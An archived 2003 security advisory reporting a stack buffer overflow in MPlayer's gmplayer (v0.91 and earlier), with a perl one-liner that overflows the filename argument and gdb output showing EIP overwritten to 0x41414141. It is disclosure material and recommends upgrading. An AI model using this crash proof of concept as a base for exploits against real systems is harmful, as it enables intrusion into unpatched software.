TUCoPS :: Linux :: Apps N-Z :: bt962.txt

Stack Buffer Overflow in MPlayer




-------------------------------------------------

No System Group - Advisory #2 - 01/09/03

-------------------------------------------------

Program:  MPlayer - The Movie Player for Linux 

Homepage:  http://www.mplayerhq.hu

Vulnerable Versions: Mplayer v0.91 and prior

Risk: Low / Medium

Impact: Stack Buffer Overflow

-------------------------------------------------





- DESCRIPTION

-------------------------------------------------

MPlayer is a movie player for LINUX (runs on many

other Unices, and non-x86 CPUs, see the documentation).

It plays most MPEG, VOB, AVI, OGG/OGM, VIVO, ASF/WMA/WMV,

QT/MOV/MP4, FLI, RM, NuppelVideo, YUV4MPEG, FILM, RoQ, PVA

files, supported by many native, XAnim, and Win32 DLL codecs.



More informations at: http://www.mplayerhq.hu





- DETAILS

-------------------------------------------------

bash-2.05b$ gmplayer `perl -e 'print "A" x 550'`

Using GNU internationalization

Original domain: messages

Original dirname: /usr/share/locale

Current domain: mplayer

Current dirname: /usr/local/share/locale



Playing

'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'

File not found:

'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'



MPlayer interrupted by signal 11 in module: unknown

- MPlayer crashed by bad usage of CPU/FPU/RAM.

  Recompile MPlayer with --enable-debug and make a 'gdb' backtrace and

  disassembly. For details, see DOCS/bugreports.html#crash.b.

- MPlayer crashed. This shouldn't happen.

  It can be a bug in the MPlayer code _or_ in your drivers _or_ in your gcc

  version. If you think it's MPlayer's fault, please read 

DOCS/bugreports.html

  and follow the instructions there. We can't and won't help unless you 

provide

  this information when reporting a possible bug.



Now we proceed to open gdb to view what may have occured.



$gdb gmplayer

GNU gdb 5.3

Copyright 2002 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you 

are

welcome to change it and/or distribute copies of it under certain 

conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB.  Type "show warranty" for details.

This GDB was configured as "i386-slackware-linux"...

(no debugging symbols found)...

(gdb) r `perl -e 'print "A" x 550'`

Starting program: /usr/local/bin/gmplayer ` perl -e 'print "A" x 550'`

(no debugging symbols found)...(no debugging symbols found)...

(no debugging symbols found)...[New Thread 16384 (LWP 2044)]

Using GNU internationalization

Original domain: messages

Original dirname: /usr/share/locale

Current domain: mplayer

Current dirname: /usr/local/share/locale



MPlayer 0.90rc5-3.2.2 (C) 2000-2003 Arpad Gereoffy (see DOCS)



Playing

'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'

File not found:

'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'



Program received signal SIGSEGV, Segmentation fault.

[Switching to Thread 16384 (LWP 2044)]

0x41414141 in ?? ()

(gdb) i r ebp eip esp

ebp            0x41414141       0x41414141

eip            0x41414141       0x41414141

esp            0xbfffd0b0       0xbfffd0b0

(gdb) 



Tested in Slackware Linux 9.0



NOTE: The program 'gmplayer' isn't SUID by default.





- SOLUTIONS

-------------------------------------------------

Update the program to latest version





- REFERENCES

-------------------------------------------------

http://www.nosystem.com.ar/advisories/advisory-02.txt





- CREDITS

-------------------------------------------------

Discovered by CoKi <coki@interlap.com.ar>



No System Group - http://www.nosystem.com.ar

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH